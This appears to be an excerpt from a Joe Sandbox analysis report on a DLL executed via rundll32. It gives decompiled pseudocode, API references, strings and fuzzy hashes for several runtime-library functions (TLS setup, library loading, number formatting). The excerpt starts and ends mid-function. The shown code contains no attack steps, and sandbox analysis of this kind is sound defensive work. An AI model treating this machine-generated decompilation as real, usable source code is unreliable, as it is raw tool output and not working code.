				char _v40;
				long _v44;
				char* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				long _v76;
				intOrPtr _v80;
				char _v84;
				long _v88;
				intOrPtr _v92;
				long _v100;
				intOrPtr _v104;
				char _v108;
				void* __ebp;
				long _t41;
				void* _t47;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void _t56;
				void* _t65;
				long _t70;
				long* _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t87;

				_t78 = _t77 - 0x5c;
				_v32 = _t78;
				_v20 = 0xffffffff;
				_v24 = E6ECD3A60;
				_t73 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				__imp__AcquireSRWLockExclusive(0x6ed1e114, __esi, __edi, __ebx);
				_v36 = 0x6ed1e114;
				_t70 =  *__ecx;
				if(_t70 != 0) {
					L10:
					__imp__ReleaseSRWLockExclusive(_v36);
					 *[fs:0x0] = _v28;
					return _t70;
				} else {
					_t7 =  &(_t73[1]); // 0x6ecd2f50
					_t56 =  *_t7;
					_t41 = TlsAlloc();
					if(_t41 == 0xffffffff) {
						_v20 = 0;
						E6ECE94E0(_t56, "assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx", 0x2e, _t70, _t73, __eflags, 0x6ed1061c);
						_t78 = _t78 + 4;
						asm("ud2");
						goto L12;
					} else {
						_t70 = _t41;
						if(_t56 == 0) {
							L9:
							 *_t73 = _t70;
							if(_t70 == 0) {
								L12:
								_v108 = 0x6ed0ff5c;
								_v104 = 1;
								_v100 = 0;
								_v92 = 0x6ed0f570;
								_v84 = 0x6ed0fdb4;
								_v80 = 2;
								_v40 = 0;
								_v44 = 0;
								_v88 = 0;
								_v76 = 0;
								_v20 = 0;
								_v60 =  &_v108;
								_v56 = E6ECC2110;
								_v68 =  &_v60;
								_v64 = 1;
								_v52 = E6ECCD0F0( &_v44, __eflags);
								_v48 =  &_v84;
								E6ECCD2B0( &_v52);
								asm("int 0x29");
								asm("ud2");
								goto L13;
							} else {
								goto L10;
							}
						} else {
							_t51 =  *0x6ed1e128; // 0xc40000
							if(_t51 != 0) {
								L6:
								_t52 = HeapAlloc(_t51, 0, 0xc);
								_t87 = _t52;
								if(_t87 == 0) {
									goto L13;
								} else {
									 *_t52 = _t56;
									 *(_t52 + 4) = _t70;
									 *(_t52 + 8) = 0;
									_t65 = _t52;
									_t53 =  *0x6ed1e12c; // 0x0
									do {
										 *((intOrPtr*)(_t65 + 8)) = _t53;
										asm("lock cmpxchg [0x6ed1e12c], ecx");
									} while (_t87 != 0);
									goto L9;
								}
							} else {
								_t51 = GetProcessHeap();
								if(_t51 == 0) {
									L13:
									_t47 = E6ECE92F0(_t56, 0xc, 4, _t70, _t73, __eflags);
									asm("ud2");
									__eflags =  &_a8;
									return E6ECCC6B0(_t47,  &_v36);
								} else {
									 *0x6ed1e128 = _t51;
									goto L6;
								}
							}
						}
					}
				}
			}

0x6ecd2966
0x6ecd2969
0x6ecd296c
0x6ecd2973
0x6ecd297a
0x6ecd2986
0x6ecd2989
0x6ecd2994
0x6ecd299a
0x6ecd29a1
0x6ecd29a5
0x6ecd2a15
0x6ecd2a18
0x6ecd2a21
0x6ecd2a30
0x6ecd29a7
0x6ecd29a7
0x6ecd29a7
0x6ecd29aa
0x6ecd29b3
0x6ecd2a31
0x6ecd2a47
0x6ecd2a4c
0x6ecd2a4f
0x00000000
0x6ecd29b5
0x6ecd29b5
0x6ecd29b9
0x6ecd2a0d
0x6ecd2a11
0x6ecd2a13
0x6ecd2a51
0x6ecd2a5a
0x6ecd2a61
0x6ecd2a68
0x6ecd2a6f
0x6ecd2a76
0x6ecd2a7d
0x6ecd2a84
0x6ecd2a88
0x6ecd2a8f
0x6ecd2a96
0x6ecd2a9d
0x6ecd2aa4
0x6ecd2aaa
0x6ecd2ab1
0x6ecd2ab4
0x6ecd2ac3
0x6ecd2ac6
0x6ecd2ac9
0x6ecd2ad3
0x6ecd2ad5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ecd29bb
0x6ecd29bb
0x6ecd29c2
0x6ecd29d6
0x6ecd29db
0x6ecd29e0
0x6ecd29e2
0x00000000
0x6ecd29e8
0x6ecd29e8
0x6ecd29ea
0x6ecd29ed
0x6ecd29f4
0x6ecd29f6
0x6ecd2a00
0x6ecd2a00
0x6ecd2a03
0x6ecd2a03
0x00000000
0x6ecd2a00
0x6ecd29c4
0x6ecd29c4
0x6ecd29cb
0x6ecd2ad7
0x6ecd2ae1
0x6ecd2ae6
0x6ecd2af4
0x6ecd2b03
0x6ecd29d1
0x6ecd29d1
0x00000000
0x6ecd29d1
0x6ecd29cb
0x6ecd29c2
0x6ecd29b9
0x6ecd29b3

APIs

AcquireSRWLockExclusive.KERNEL32(6ED1E114), ref: 6ECD2994
TlsAlloc.KERNEL32 ref: 6ECD29AA
GetProcessHeap.KERNEL32 ref: 6ECD29C4
HeapAlloc.KERNEL32(00C40000,00000000,0000000C), ref: 6ECD29DB
ReleaseSRWLockExclusive.KERNEL32(6ED1E114), ref: 6ECD2A18

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6ECD2A38

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: 92223a0ed426d76191a3fd2cb1ecba0f73d98c1d8d39e9e13aaf44c354d689ce
Instruction ID: 9b3f04a42349955b66bd13770d668a23afe78f602d2ab4864f73d11e1c300725
Opcode Fuzzy Hash: 92223a0ed426d76191a3fd2cb1ecba0f73d98c1d8d39e9e13aaf44c354d689ce
Instruction Fuzzy Hash: 884169B19003098FEB14CFE4D855BDEBBB4FB44314F204129EA19AB784EB759849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE42BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6ECE42BC(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x6ed1e860 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x6ed166b0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x6ed1e860 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x6ed1e860 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E6ECE1EF8(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E6ECE1EF8(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x6ece42c5
0x6ece435a
0x6ece42cd
0x6ece42cf
0x6ece42d9
0x6ece42de
0x6ece42eb
0x6ece4300
0x6ece4304
0x6ece436a
0x6ece436f
0x6ece4376
0x6ece437a
0x6ece437d
0x6ece437d
0x6ece4383
0x6ece4383
0x6ece4365
0x6ece4369
0x6ece4369
0x6ece4306
0x6ece430f
0x6ece4348
0x6ece4355
0x6ece4357
0x6ece4357
0x00000000
0x6ece4357
0x6ece4319
0x6ece431e
0x6ece4323
0x00000000
0x00000000
0x6ece432d
0x6ece4332
0x6ece4337
0x00000000
0x00000000
0x6ece433c
0x6ece4342
0x6ece4346
0x00000000
0x00000000
0x00000000
0x6ece4346
0x6ece42e3
0x00000000
0x00000000
0x00000000
0x6ece42e9
0x6ece4363
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,6ECE43C9,FFFDC801,00000400,?,00000000,00000001,?,6ECE4542,00000021,FlsSetValue,6ED16BF8,6ED16C00,?), ref: 6ECE437D

Strings

ext-ms-, xrefs: 6ECE4327
api-ms-, xrefs: 6ECE4313

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 8bc95cc09bc40b27e477b72a9dff054e9e980b2d94e7df502eb7827c7485be32
Instruction ID: a4d0d6aa3ec8c4b65598d19f78077e2cda87fc08ff4eac2921f4489daaf48940
Opcode Fuzzy Hash: 8bc95cc09bc40b27e477b72a9dff054e9e980b2d94e7df502eb7827c7485be32
Instruction Fuzzy Hash: 10210636A44611ABDB119BA5DC45A9E7778FB863B0F110160ED26A7F84F730ED07C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF3BF, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6ECDF3BF(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6ed1d820 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6ECE057B(_t13, __eflags,  *0x6ed1d820);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6ECE05B6(_t14, __eflags,  *0x6ed1d820, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6ECE1CC1();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6ECE05B6(_t18, __eflags,  *0x6ed1d820, 0);
								} else {
									_t8 = E6ECE05B6(_t18, __eflags,  *0x6ed1d820, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6ECE1C08(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ecdf3bf
0x6ecdf3c6
0x6ecdf3d9
0x6ecdf3e0
0x6ecdf3e2
0x6ecdf3e3
0x6ecdf3e6
0x6ecdf3ff
0x6ecdf3ff
0x6ecdf3e8
0x6ecdf3e8
0x6ecdf3ea
0x6ecdf3f4
0x6ecdf3fb
0x6ecdf3fd
0x6ecdf404
0x6ecdf40d
0x6ecdf410
0x6ecdf411
0x6ecdf413
0x6ecdf427
0x6ecdf427
0x6ecdf430
0x6ecdf415
0x6ecdf41c
0x6ecdf422
0x6ecdf423
0x6ecdf425
0x6ecdf439
0x6ecdf43b
0x6ecdf43b
0x00000000
0x00000000
0x00000000
0x6ecdf425
0x6ecdf43e
0x00000000
0x00000000
0x00000000
0x6ecdf3fd
0x6ecdf3ea
0x6ecdf446
0x6ecdf450
0x6ecdf3c8
0x6ecdf3ca
0x6ecdf3ca

APIs

GetLastError.KERNEL32(00000001,?,6ECDF101,6ECDCFA2,6ECDC7AC,?,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8,0000000C,6ECDCADD), ref: 6ECDF3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ECDF3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ECDF3F4
SetLastError.KERNEL32(00000000,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8,0000000C,6ECDCADD,?,00000001,?), ref: 6ECDF446

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0b6833560395c8a6cc657212b13a64e41cd6a43fe9cc7cd86b28c8819748461d
Instruction ID: ee6a3900db8dd8b731893077ccf3b5858ec9b78c1f908b20cf955e924ec1c97c
Opcode Fuzzy Hash: 0b6833560395c8a6cc657212b13a64e41cd6a43fe9cc7cd86b28c8819748461d
Instruction Fuzzy Hash: 8E01D832119B225EFA612AF56C8659736F9FB46379730062AEA20446D8FF53480BD584

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDBE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6ECDC510: GetTickCount64.KERNEL32 ref: 6ECDC517

GetTickCount64.KERNEL32 ref: 6ECDBE96
GetTickCount64.KERNEL32 ref: 6ECDBEB4
GetTickCount64.KERNEL32 ref: 6ECDBECD
GetTickCount64.KERNEL32 ref: 6ECDBECF
GetTickCount64.KERNEL32 ref: 6ECDBED6
GetTickCount64.KERNEL32 ref: 6ECDBEF4

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: d458593e7b095f0b418a6e28b756af0473555856244e0491d6b7eaee0544c54d
Instruction ID: ee6dade06aa4f6ebc5af0e70f976716732fb8ce89007629cd77c237ca4fd17e3
Opcode Fuzzy Hash: d458593e7b095f0b418a6e28b756af0473555856244e0491d6b7eaee0544c54d
Instruction Fuzzy Hash: C9018022C20E188DE203BA79984254AAABD5F973E0B158713D10637406FF9114E793D1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC6B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6ECC6B40(short* __ecx, signed int __edx) {
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				short _t38;
				void* _t39;
				signed int _t45;
				short _t50;
				void* _t51;
				short _t52;
				signed int _t53;
				signed int _t62;
				unsigned int _t66;
				char* _t78;
				signed int _t85;
				signed short _t88;
				intOrPtr _t90;
				char* _t91;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x30;
				_t90 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t90 == 0) {
					L6:
					_t52 = 0;
					L7:
					return _t52;
				}
				_push(1);
				_t30 = E6ECC1C10(_t90,  &M6ED0F3B9);
				_t96 = _t96 + 4;
				_t52 = 1;
				if(_t30 != 0) {
					goto L7;
				}
				if((__edx |  *(_t96 + 0x44)) == 0) {
					_push(1);
					return E6ECC1C10(_t90, "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool");
				}
				 *_t96 = _t90;
				_t91 = 0;
				_t62 =  *((intOrPtr*)(__ecx + 0x18)) - __edx;
				asm("sbb esi, eax");
				if(_t62 >= 0) {
					__eflags = _t62 - 0x1a;
					asm("sbb eax, 0x0");
					if(_t62 >= 0x1a) {
						_t85 = _t62;
						_t78 = "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool";
						_push(1);
						_t34 = E6ECC1C10( *_t96, _t78);
						_t96 = _t96 + 4;
						__eflags = _t34;
						if(_t34 != 0) {
							goto L7;
						}
						__eflags = _t85 - 0x2710;
						_t53 = _t85;
						asm("sbb eax, 0x0");
						if(_t85 < 0x2710) {
							_t36 = 0x27;
							L18:
							__eflags = _t53 - 0x63;
							if(_t53 > 0x63) {
								_t66 = _t53 & 0x0000ffff;
								_t53 = (_t66 >> 2) * 0x147b >> 0x11;
								 *((short*)(_t96 + _t36 + 6)) =  *((_t66 - _t53 * 0x00000064 & 0x0000ffff) + (_t66 - _t53 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
								_t36 = _t36 + 0xfffffffe;
								__eflags = _t36;
							}
							__eflags = _t53 - 0xa;
							if(_t53 >= 0xa) {
								_t24 = _t53 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
								 *((short*)(_t96 + _t36 + 6)) =  *(_t53 + _t24) & 0x0000ffff;
								_t37 = _t36 + 0xfffffffe;
								__eflags = _t37;
							} else {
								 *((char*)(_t96 + _t36 + 7)) = _t53 + 0x30;
								_t37 = _t36 - 1;
							}
							_push(0x27 - _t37);
							_push(_t96 + _t37 + 8);
							_push(0);
							_t38 = E6ECC18D0( *_t96, 0x6ed0f570);
							_t96 = _t96 + 0xc;
							_t52 = _t38;
							goto L7;
						}
						_t39 = 0x27;
						do {
							_t94 = _t39;
							_t88 = E6ECDC5D0(_t53, _t91, 0x2710, 0);
							 *(_t96 + 4) = E6ECDC650(_t53, _t91, 0x2710, 0);
							_t45 = ((_t88 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
							_t8 = _t45 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
							__eflags = 0x5f5e0ff - _t53;
							_t53 =  *(_t96 + 4);
							asm("sbb ecx, esi");
							_t91 = _t78;
							 *((short*)(_t96 + _t94 + 4)) =  *(_t45 + _t8) & 0x0000ffff;
							 *((short*)(_t96 + _t94 + 6)) =  *((_t88 - _t45 * 0x00000064 & 0x0000ffff) + (_t88 - _t45 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
							_t16 = _t94 - 4; // 0x23
							_t39 = _t16;
						} while (__eflags < 0);
						goto L18;
					}
					 *((intOrPtr*)(_t96 + 8)) = _t62 + 0x61;
					_t50 = E6ECC3490(_t96 + 8, _t96 + 8,  *_t96);
					_t96 = _t96 + 8;
					_t52 = _t50;
					goto L7;
				}
				_push(0x10);
				_t51 = E6ECC1C10( *_t96,  &M6ED0F395);
				_t96 = _t96 + 4;
				if(_t51 != 0) {
					goto L7;
				}
				 *__ecx = 1;
				goto L6;
			}

0x6ecc6b44
0x6ecc6b47
0x6ecc6b4c
0x6ecc6b9c
0x6ecc6b9c
0x6ecc6b9e
0x00000000
0x6ecc6ba0
0x6ecc6b59
0x6ecc6b5b
0x6ecc6b60
0x6ecc6b63
0x6ecc6b67
0x00000000
0x00000000
0x6ecc6b71
0x6ecc6baf
0x00000000
0x6ecc6bb6
0x6ecc6b76
0x6ecc6b79
0x6ecc6b7b
0x6ecc6b7d
0x6ecc6b7f
0x6ecc6bbb
0x6ecc6bc0
0x6ecc6bc3
0x6ecc6be0
0x6ecc6be5
0x6ecc6bea
0x6ecc6bec
0x6ecc6bf1
0x6ecc6bf4
0x6ecc6bf6
0x00000000
0x00000000
0x6ecc6bf8
0x6ecc6c00
0x6ecc6c02
0x6ecc6c05
0x6ecc6c80
0x6ecc6c85
0x6ecc6c85
0x6ecc6c88
0x6ecc6c8a
0x6ecc6c98
0x6ecc6cab
0x6ecc6cb0
0x6ecc6cb0
0x6ecc6cb0
0x6ecc6cb3
0x6ecc6cb6
0x6ecc6cc2
0x6ecc6cca
0x6ecc6ccf
0x6ecc6ccf
0x6ecc6cb8
0x6ecc6cbb
0x6ecc6cbf
0x6ecc6cbf
0x6ecc6ce5
0x6ecc6ce6
0x6ecc6ce7
0x6ecc6ce9
0x6ecc6cee
0x6ecc6cf1
0x00000000
0x6ecc6cf1
0x6ecc6c07
0x6ecc6c10
0x6ecc6c10
0x6ecc6c20
0x6ecc6c30
0x6ecc6c40
0x6ecc6c46
0x6ecc6c55
0x6ecc6c57
0x6ecc6c60
0x6ecc6c62
0x6ecc6c64
0x6ecc6c74
0x6ecc6c79
0x6ecc6c79
0x6ecc6c79
0x00000000
0x6ecc6c7e
0x6ecc6bcc
0x6ecc6bd4
0x6ecc6bd9
0x6ecc6bdc
0x00000000
0x6ecc6bdc
0x6ecc6b89
0x6ecc6b8b
0x6ecc6b90
0x6ecc6b95
0x00000000
0x00000000
0x6ecc6b97
0x00000000

APIs

__aullrem.LIBCMT ref: 6ECC6C1B
__aulldiv.LIBCMT ref: 6ECC6C2B

Strings

'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC6B54
{invalid syntax}, xrefs: 6ECC6B84
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ECC6BAA, 6ECC6BE5

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: 9cafb5d6eae1f4158fe221f8d5b9b79ef32d97d6fc86569a171af4dda56820a4
Instruction ID: c37332a36eb8fb00331fb462496b017cbeadc4b14d5840d6b513f2cbfeaac05d
Opcode Fuzzy Hash: 9cafb5d6eae1f4158fe221f8d5b9b79ef32d97d6fc86569a171af4dda56820a4
Instruction Fuzzy Hash: FE4165307182104BD3149EADD950B3AB2E5DF84F14F24483EEA89CB3C6F665C8568393

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCD000, Relevance: 8.8, APIs: 7, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E6ECCD000(void* __ebx, void* __edi) {
				void _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				void* _v33;
				void* _v35;
				void* _v36;
				signed int _v39;
				void* _v44;
				long _v48;
				char _v76;
				void* __esi;
				long _t30;
				void* _t32;
				long _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				signed char _t43;
				signed char _t44;
				signed int _t46;
				void** _t49;
				void* _t51;
				long _t53;
				void* _t55;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t65;
				void* _t67;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t89;
				void* _t90;
				void* _t91;

				_t77 = __edi;
				_t55 = __ebx;
				_push(_t79);
				_t30 =  *0x6ed1d04c; // 0x0
				if(_t30 == 0) {
					_t32 = TlsGetValue(E6ECD2960(__ebx, 0x6ed1d04c, __edi, _t79));
					__eflags = _t32 - 1;
					if(_t32 <= 1) {
						goto L5;
					} else {
						goto L4;
					}
				} else {
					_t32 = TlsGetValue(_t30);
					if(_t32 > 1) {
						L4:
						__eflags =  *_t32 - 1;
						_t82 = _t32;
						if( *_t32 == 1) {
							goto L18;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t33 =  *0x6ed1d04c; // 0x0
						if(_t33 == 0) {
							_t35 = TlsGetValue(E6ECD2960(_t55, 0x6ed1d04c, _t77, _t79));
							__eflags = _t35;
							if(_t35 != 0) {
								goto L7;
							} else {
								goto L10;
							}
						} else {
							_t35 = TlsGetValue(_t33);
							if(_t35 == 0) {
								L10:
								_t37 =  *0x6ed1e128; // 0xc40000
								__eflags = _t37;
								if(_t37 != 0) {
									L13:
									_t38 = HeapAlloc(_t37, 0, 0xc);
									__eflags = _t38;
									if(__eflags == 0) {
										goto L20;
									} else {
										 *_t38 = 0;
										 *(_t38 + 8) = 0x6ed1d04c;
										_t82 = _t38;
										_t53 =  *0x6ed1d04c; // 0x0
										__eflags = _t53;
										if(_t53 == 0) {
											_t53 = E6ECD2960(_t55, 0x6ed1d04c, _t77, _t82);
										}
										TlsSetValue(_t53, _t82);
										goto L17;
									}
								} else {
									_t37 = GetProcessHeap();
									__eflags = _t37;
									if(__eflags == 0) {
										L20:
										E6ECE92F0(_t55, 0xc, 4, _t77, _t79, __eflags);
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t55);
										_push(_t77);
										_push(_t79);
										_t90 = _t89 - 0x38;
										_v36 = _t90;
										_v24 = 0xffffffff;
										_v28 = E6ECD39B0;
										_v32 =  *[fs:0x0];
										 *[fs:0x0] =  &_v32;
										_v48 = 0xc;
										_v44 = 4;
										_v24 = 0;
										asm("movsd xmm0, [edx+0x10]");
										asm("movsd xmm2, [edx]");
										asm("movsd xmm1, [edx+0x8]");
										asm("movsd [ebp-0x34], xmm0");
										asm("movsd [ebp-0x3c], xmm1");
										asm("movsd [ebp-0x44], xmm2");
										_push( &_v76);
										E6ECC2150( &_v48, 0x6ed0fba0);
										_t91 = _t90 + 4;
										_t43 = _v44;
										__eflags = _t43;
										if(_t43 == 0) {
											_t44 = 4;
											__eflags = 4 - 3;
											if(4 != 3) {
												_t61 = 0x6ed0fb98;
											} else {
												_t65 = _v36;
												_v48 = _t65;
												_v20 = 1;
												 *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))))( *_t65);
												_t91 = _t91 + 4;
												_t49 = _v48;
												_t67 = _t49[1];
												__eflags =  *(_t67 + 4);
												if( *(_t67 + 4) != 0) {
													_t51 =  *_t49;
													__eflags =  *((intOrPtr*)(_t67 + 8)) - 9;
													if( *((intOrPtr*)(_t67 + 8)) >= 9) {
														_t51 =  *(_t51 - 4);
													}
													HeapFree( *0x6ed1e128, 0, _t51);
												}
												HeapFree( *0x6ed1e128, 0, _v36);
												_t61 = 0x6ed0fb98;
												_t44 = 4;
											}
											goto L32;
										} else {
											__eflags = _t43 - 4;
											if(_t43 != 4) {
												_t44 = _t43;
												_t63 = _v39;
											} else {
												_t61 = 0x6ed0fb98;
												_t44 = 2;
												L32:
												_t63 = _t61 << 0x00000018 | 0x00000028;
												__eflags = _t63;
											}
										}
										_t46 = _t44 & 0x000000ff | _t63 << 0x00000008;
										__eflags = _t46;
										 *[fs:0x0] = _v28;
										return _t46;
									} else {
